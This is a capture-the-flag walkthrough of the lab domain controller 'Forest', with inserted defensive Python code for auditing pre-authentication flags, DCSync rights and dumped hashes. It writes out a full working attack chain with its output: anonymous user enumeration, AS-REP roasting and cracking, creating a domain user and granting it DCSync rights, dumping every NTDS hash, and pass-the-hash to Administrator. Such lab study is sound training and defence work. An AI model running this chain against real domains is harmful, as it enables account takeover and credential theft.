Enumeration
We start by scanning the machine's ports with nmap, where we find several open ports, among them smb, winrm and others.
❯ nmap 10.10.10.161
Nmap scan report for 10.10.10.161
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49685/tcp open unknown
49701/tcp open unknown
59440/tcp open unknown
With crackmapexec we obtain the domain of the victim machine, htb.local.
❯ crackmapexec smb 10.10.10.161
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
We add the domain to /etc/hosts for possible attacks later on.
❯ echo "10.10.10.161 htb.local" | sudo tee -a /etc/hosts
With rpcclient we can connect; in this case it lets us connect without providing credentials, so we enumerate the domain users.
❯ rpcclient -N -U '' 10.10.10.161 -c enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Applying regular expressions we can get a list containing only the usernames.
❯ rpcclient -N -U '' 10.10.10.161 -c enumdomusers | grep -oP '\[\D*?\]' | tr -d '[]'
Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
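The grep pipeline above keeps only bracketed names that contain no digits, which is why the SM_ and HealthMailbox accounts disappear from the list. The following parser is an added example (not code from the original write-up) that reads the enumdomusers format line by line, keeps every account with its RID, and lets you drop built-in or system accounts by an explicit rule instead of by accident of the regex. The sample input is constructed to match the format rpcclient prints; it is not a capture from the page's target.

```python
import re
from typing import List, Tuple

# Constructed sample in the format rpcclient's "enumdomusers" command prints
# (user:[name] rid:[0xhex]); these rows are made up for the example.
SAMPLE_ENUMDOMUSERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[svc-alfresco] rid:[0x47b]
user:[user2] rid:[0x47e]
some unrelated line that must be ignored
"""

# Match a whole line. The name may contain digits, so match "anything up to the
# closing bracket" instead of "non-digits only".
ENUMDOMUSERS_RE = re.compile(
    r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$"
)

# RIDs below 1000 are reserved for well-known principals
# (Administrator 500, Guest 501, krbtgt 502, ...).
FIRST_NON_BUILTIN_RID = 1000


def parse_enumdomusers(text: str) -> List[Tuple[str, int]]:
    """Return (sAMAccountName, RID) for every well-formed enumdomusers line."""
    users = []
    for line in text.splitlines():
        m = ENUMDOMUSERS_RE.match(line.strip())
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def usernames(text: str, skip_builtin: bool = False,
              skip_prefixes: Tuple[str, ...] = ()) -> List[str]:
    """Names only, optionally dropping built-in RIDs and known system-account
    prefixes (for example Exchange's SM_ and HealthMailbox accounts)."""
    out = []
    for name, rid in parse_enumdomusers(text):
        if skip_builtin and rid < FIRST_NON_BUILTIN_RID:
            continue
        if any(name.startswith(p) for p in skip_prefixes):
            continue
        out.append(name)
    return out


def digit_free_names(text: str) -> List[str]:
    """Mirror of the page's grep -oP pipeline: any name containing a digit is
    dropped. Kept here only to show what that filter silently loses."""
    return [name for name, _ in parse_enumdomusers(text)
            if not any(c.isdigit() for c in name)]


if __name__ == "__main__":
    print(parse_enumdomusers(SAMPLE_ENUMDOMUSERS))
    print(usernames(SAMPLE_ENUMDOMUSERS, skip_builtin=True,
                    skip_prefixes=("SM_", "HealthMailbox")))
    lost = set(usernames(SAMPLE_ENUMDOMUSERS)) - set(digit_free_names(SAMPLE_ENUMDOMUSERS))
    print("dropped by the digit-free regex:", sorted(lost))
```

Run against the constructed sample, `user2` is a normal account that the digit-free grep would have dropped; on a real domain that is the kind of gap that makes a user list incomplete for either an attacker's spray or a defender's audit.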
Shell - svc-alfresco
We save the list in a file users.txt and with GetNPUsers we can perform an ASREPRoast attack; as a result we obtain a hash for the user svc-alfresco.
❯ impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:48c8e22a848540c95009c837dd0dc91d$14a282620980c10b59951a0c5e604886d4b658ba9a8da0e160dee9d6de49945ca06e63b42974d0505023001051d1950a50651a06c47eb2bea13a41721110c1848f92b8e1a0f047b6722cd4fbc0774ca88dbc2ba3a522a9e34e44ce324104645c11081539db41b3727a3de96531e00015febdab4fe478b7a35356dd651b22de4b1271efe02b6a64df6d681475e87d74bcda943c0aa9b5ba56f7f379adbfaa65c9ee3c3bb732297375b6c8f99e3f9a41d023aaceb34c675aa2f72c1e930bbd965128ec78373271bcd0592da03f6d925e1f1c0d3051cbc6dab1e5ab5930d1659b4a56ffabc9699b
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
We save the hash in a file called hash and with john we brute-force it, obtaining svc-alfresco's password in plain text, which is s3rvice.
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
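The GetNPUsers output above mixes three kinds of lines: accounts where pre-authentication is enforced, KDC errors for accounts the KDC rejects outright (KDC_ERR_CLIENT_REVOKED is what disabled, expired or locked accounts return), and the one AS-REP hash. The block below is an added example, not the author's code: it sorts that output into a report and, for the defender's side, audits a userAccountControl export for enabled accounts that still carry the DONT_REQUIRE_PREAUTH bit. The sample output and the UAC values are constructed; the hex blob in the sample is dummy data, not a real AS-REP.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# userAccountControl bits from the AD schema (values are standard, not from the page)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Hash line printed by impacket's GetNPUsers:
# $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<ciphertext>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]+)\$(?P<cipher>[0-9a-f]+)$"
)
PREAUTH_OK_RE = re.compile(
    r"^\[-\] User (?P<user>\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$"
)
KDC_ERR_RE = re.compile(r"^\[-\] Kerberos SessionError: (?P<code>KDC_ERR_\w+)")

# Constructed sample mimicking the page's GetNPUsers output (dummy hash blob).
SAMPLE_GETNPUSERS = """\
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User alice doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-example@CORP.EXAMPLE:00112233445566778899aabbccddeeff$0123456789abcdef0123456789abcdef
[-] User bob doesn't have UF_DONT_REQUIRE_PREAUTH set
"""


@dataclass
class Roastable:
    user: str
    realm: str
    etype: int  # 23 = RC4-HMAC, the fast-to-crack case; 17/18 = AES with PBKDF2


@dataclass
class NpUsersReport:
    roastable: List[Roastable]
    preauth_enforced: List[str]
    kdc_errors: Dict[str, int]


def parse_getnpusers(text: str) -> NpUsersReport:
    """Classify each GetNPUsers output line; unknown lines (banner etc.) are ignored."""
    report = NpUsersReport([], [], {})
    for raw in text.splitlines():
        line = raw.strip()
        if (m := ASREP_RE.match(line)):
            report.roastable.append(Roastable(m["user"], m["realm"], int(m["etype"])))
        elif (m := PREAUTH_OK_RE.match(line)):
            report.preauth_enforced.append(m["user"])
        elif (m := KDC_ERR_RE.match(line)):
            report.kdc_errors[m["code"]] = report.kdc_errors.get(m["code"], 0) + 1
    return report


def audit_preauth(accounts: Dict[str, int]) -> List[str]:
    """Given sAMAccountName -> userAccountControl (e.g. exported over LDAP), return
    the enabled accounts that do not require Kerberos pre-authentication. Disabled
    accounts are skipped: the KDC refuses them before issuing any AS-REP."""
    return sorted(
        name for name, uac in accounts.items()
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    )


# Constructed UAC values (0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD)
SAMPLE_UAC = {
    "svc-example": 0x10200 | UF_DONT_REQUIRE_PREAUTH,                      # finding
    "olduser": 0x10200 | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE,      # disabled, skipped
    "alice": 0x10200,                                                      # pre-auth required
}

if __name__ == "__main__":
    rep = parse_getnpusers(SAMPLE_GETNPUSERS)
    print("roastable:", [(r.user, r.realm, r.etype) for r in rep.roastable])
    print("pre-auth enforced:", rep.preauth_enforced)
    print("KDC errors:", rep.kdc_errors)
    print("UAC audit:", audit_preauth(SAMPLE_UAC))
```

The remediation the audit points at is simply clearing the flag on the account (or, where an application genuinely needs it, giving the account a long random password so an etype-23 AS-REP is not crackable with a wordlist like rockyou).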
We can verify with crackmapexec that the credentials are valid for smb, and listing the shares we find nothing really interesting.
❯ crackmapexec smb 10.10.10.161 -u svc-alfresco -p s3rvice --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [+] Enumerated shares
SMB 10.10.10.161 445 FOREST Share Permissions Remark
SMB 10.10.10.161 445 FOREST ----- ----------- ------
SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin
SMB 10.10.10.161 445 FOREST C$ Default share
SMB 10.10.10.161 445 FOREST IPC$ Remote IPC
SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share
SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server share
However, winrm is open and we can verify that the credentials are valid there as well.
❯ crackmapexec winrm 10.10.10.161 -u svc-alfresco -p s3rvice
SMB 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
We connect with evil-winrm, get a shell and can read the flag.
❯ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
PS C:\Users\svc-alfresco\Documents> type ..\Desktop\user.txt
8f9**************************431
PS C:\Users\svc-alfresco\Documents>
Shell - Administrator
We will use bloodhound-python to enumerate all the privileges in the domain.
❯ bloodhound-python -u svc-alfresco -p s3rvice -c All -d htb.local -ns 10.10.10.161 --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 32 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 52S
We upload the data to BloodHound and in the shortest paths we can see that we belong to the Account Operators group, which has GenericAll over Exchange Windows Permissions, which in turn has WriteDacl over the domain; with that we can perform a DCSync attack to obtain Administrator.
We start by uploading the PowerView module with the upload function and importing it.
PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
PS C:\Users\svc-alfresco\Documents> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents>
Since our user belongs to Account Operators, we create a domain user pwned and add it to the Exchange Windows Permissions group.
PS C:\Users\svc-alfresco\Documents> net user pwned password123# /add /domain
The command completed successfully.
PS C:\Users\svc-alfresco\Documents> net group 'Exchange Windows Permissions' pwned /add /domain
The command completed successfully.
PS C:\Users\svc-alfresco\Documents>
We define the credentials of pwned and with Add-DomainObjectAcl we grant it the right to perform a DCSync, so that we can obtain the hashes from ntds.dit.
PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'password123#' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\pwned', $SecPassword)
PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'htb.local\Domain Admins' -PrincipalIdentity pwned -Rights DCSync
PS C:\Users\svc-alfresco\Documents>
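The whole privilege chain above (GenericAll on a group, WriteDacl on the domain head, then a fresh ACE granting the replication rights) is visible in the DACL of the domain object, so it is also where a defender catches it. The block below is an added example, not part of the original write-up or of PowerView: it takes a list of ACEs already read from the domain head (constructed here, with the real extended-right GUIDs that DCSync needs) and reports every principal outside an allow-list that either holds both replication rights or holds WriteDacl/WriteOwner and could grant them to itself. Inheritance flags and group nesting are assumed to be resolved beforehand.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Extended-right GUIDs from the AD schema that together make up "DCSync".
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Access-mask bits (ADS_RIGHTS_ENUM / standard rights).
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
GENERIC_ALL = 0x10000000

# Principals expected to replicate or to own the domain head's ACL.
DEFAULT_ALLOWLIST = {
    "Domain Controllers", "Enterprise Domain Controllers", "Administrators",
    "Domain Admins", "Enterprise Admins", "SYSTEM",
}


@dataclass(frozen=True)
class Ace:
    principal: str
    allow: bool                        # True = ACCESS_ALLOWED, False = ACCESS_DENIED
    mask: int
    object_type: Optional[str] = None  # extended-right GUID for object ACEs, else None


def effective_rights(aces: List[Ace]) -> Dict[str, Set[str]]:
    """Symbolic rights per principal: allowed minus denied (explicit denies win)."""
    allowed: Dict[str, Set[str]] = {}
    denied: Dict[str, Set[str]] = {}
    for ace in aces:
        rights = (allowed if ace.allow else denied).setdefault(ace.principal, set())
        if ace.object_type is None:
            if ace.mask & GENERIC_ALL:
                rights |= {"GenericAll", "WriteDacl", "WriteOwner"} | REPLICATION_RIGHTS
            if ace.mask & WRITE_DAC:
                rights.add("WriteDacl")
            if ace.mask & WRITE_OWNER:
                rights.add("WriteOwner")
            if ace.mask & ADS_RIGHT_DS_CONTROL_ACCESS:
                rights |= REPLICATION_RIGHTS   # unscoped control access = every extended right
        elif ace.mask & ADS_RIGHT_DS_CONTROL_ACCESS and ace.object_type.lower() in REPLICATION_RIGHTS:
            rights.add(ace.object_type.lower())
    return {p: allowed[p] - denied.get(p, set()) for p in allowed}


def audit_dcsync(aces: List[Ace], allowlist: Set[str] = DEFAULT_ALLOWLIST) -> List[Tuple[str, str]]:
    """Findings for principals outside the allow-list, sorted by principal name."""
    findings = []
    for principal, rights in sorted(effective_rights(aces).items()):
        if principal in allowlist:
            continue
        if REPLICATION_RIGHTS <= rights:
            findings.append((principal, "holds DCSync (GetChanges + GetChangesAll)"))
        elif rights & REPLICATION_RIGHTS:
            findings.append((principal, "partial replication right"))
        if rights & {"WriteDacl", "WriteOwner"}:
            findings.append((principal, "can grant itself DCSync via WriteDacl/WriteOwner"))
    return findings


# Constructed DACL of a domain head, modelled on the situation the write-up describes.
SAMPLE_ACES = [
    Ace("Domain Admins", True, GENERIC_ALL),
    Ace("Enterprise Domain Controllers", True, ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    Ace("Exchange Windows Permissions", True, WRITE_DAC),
    Ace("pwned", True, ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    Ace("pwned", True, ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    Ace("backup-svc", True, ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    Ace("contractor", True, GENERIC_ALL),
    Ace("contractor", False, GENERIC_ALL),   # explicit deny cancels the allow
]

if __name__ == "__main__":
    for principal, verdict in audit_dcsync(SAMPLE_ACES):
        print(f"{principal}: {verdict}")
```

Running this periodically (or on every DACL change event for the domain object) surfaces both the pre-existing WriteDacl held by Exchange Windows Permissions and the freshly added replication ACEs of the throwaway user, which is the detection opportunity this privilege path leaves behind.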
Using crackmapexec with the credentials of the user pwned we can dump all the hashes from ntds.dit, among them the hash of the Administrator user.
❯ crackmapexec smb 10.10.10.161 -u pwned -p password123# --ntds drsuapi
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\pwned:password123#
SMB 10.10.10.161 445 FOREST [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.161 445 FOREST [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.161 445 FOREST htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
SMB 10.10.10.161 445 FOREST Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
SMB 10.10.10.161 445 FOREST DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
SMB 10.10.10.161 445 FOREST htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
SMB 10.10.10.161 445 FOREST htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
SMB 10.10.10.161 445 FOREST htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
SMB 10.10.10.161 445 FOREST htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
SMB 10.10.10.161 445 FOREST htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
SMB 10.10.10.161 445 FOREST htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
SMB 10.10.10.161 445 FOREST pwned:9602:aad3b435b51404eeaad3b435b51404ee:e5abfbc0410c5ce37bae2276dee52aaf:::
SMB 10.10.10.161 445 FOREST FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:0a5bb0c2d2dada829b5c37f4bf908373:::
SMB 10.10.10.161 445 FOREST EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
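A dump like the one above is also what a credential audit (or an incident responder confirming what was taken) has to read. The following parser is an added example, not the author's tooling: it reads pwdump-style records whether or not they carry crackmapexec's "SMB <ip> <port> <host>" prefix, and flags accounts whose NT hash is the well-known hash of the empty string, accounts that still have an LM hash stored, and groups of accounts sharing one NT hash (password reuse). The sample lines and hashes are constructed, not from the page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM of "" (LM storage disabled)
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT (MD4) of the empty string

# [domain\]user:rid:lmhash:nthash::: anywhere in the line, so a tool prefix is tolerated.
# Assumes sAMAccountNames without whitespace, which is the common case.
RECORD_RE = re.compile(
    r"(?:(?P<domain>[^\s\\:]+)\\)?(?P<user>[^\s\\:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)


@dataclass
class Secret:
    domain: Optional[str]
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")


def parse_ntds_dump(text: str) -> List[Secret]:
    """Return one Secret per pwdump record; status and banner lines are skipped."""
    out = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if m:
            out.append(Secret(m["domain"], m["user"], int(m["rid"]),
                              m["lm"].lower(), m["nt"].lower()))
    return out


def audit_dump(text: str) -> Dict[str, object]:
    """Hygiene findings over user accounts; machine accounts are listed separately."""
    secrets = parse_ntds_dump(text)
    users = [s for s in secrets if not s.is_machine]
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for s in users:
        by_nt[s.nt].append(s.user)
    return {
        "empty_password": [s.user for s in users if s.nt == EMPTY_NT_HASH],
        "lm_stored": [s.user for s in users if s.lm != EMPTY_LM_HASH],
        "reused": {nt: names for nt, names in by_nt.items()
                   if nt != EMPTY_NT_HASH and len(names) > 1},
        "machine_accounts": [s.user for s in secrets if s.is_machine],
    }


# Constructed sample in crackmapexec's --ntds output shape (dummy hashes).
_P = "SMB 10.0.0.5 445 DC01"
SAMPLE_NTDS = "\n".join([
    f"{_P} [+] Dumping the NTDS, this could take a while so go grab a redbull...",
    f"{_P} corp.example\\Administrator:500:{EMPTY_LM_HASH}:{'1' * 32}:::",
    f"{_P} Guest:501:{EMPTY_LM_HASH}:{EMPTY_NT_HASH}:::",
    f"{_P} corp.example\\alice:1105:{EMPTY_LM_HASH}:{'2' * 32}:::",
    f"{_P} corp.example\\bob:1106:{EMPTY_LM_HASH}:{'2' * 32}:::",
    f"{_P} corp.example\\legacy:1107:{'0f' * 16}:{'3' * 32}:::",
    f"{_P} DC01$:1000:{EMPTY_LM_HASH}:{'4' * 32}:::",
])

if __name__ == "__main__":
    for key, value in audit_dump(SAMPLE_NTDS).items():
        print(f"{key}: {value}")
```

An empty NT hash on a disabled account (Guest, DefaultAccount and the SM_ accounts in the page's output) is expected and harmless; the finding matters when the account is enabled, so the "empty_password" list should be joined against userAccountControl before anyone is paged.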
We can perform a pass-the-hash, providing only the NT hash of Administrator, to connect with evil-winrm and get a shell as well as the flag.
❯ evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
PS C:\Users\Administrator\Documents> whoami
htb\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
aa8**************************cc6
PS C:\Users\Administrator\Documents>